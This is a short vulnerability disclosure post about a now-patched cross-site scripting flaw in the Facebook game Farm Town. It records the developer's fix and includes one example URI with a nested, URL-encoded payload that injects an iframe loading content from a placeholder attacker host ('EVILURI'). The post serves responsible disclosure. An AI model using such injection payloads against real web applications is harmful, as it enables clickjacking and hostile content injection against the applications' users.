FAXX Hack: Farm Town

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Share with your friends!
  • Facebook
  • Twitter
  • Google Plus
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Comments are closed.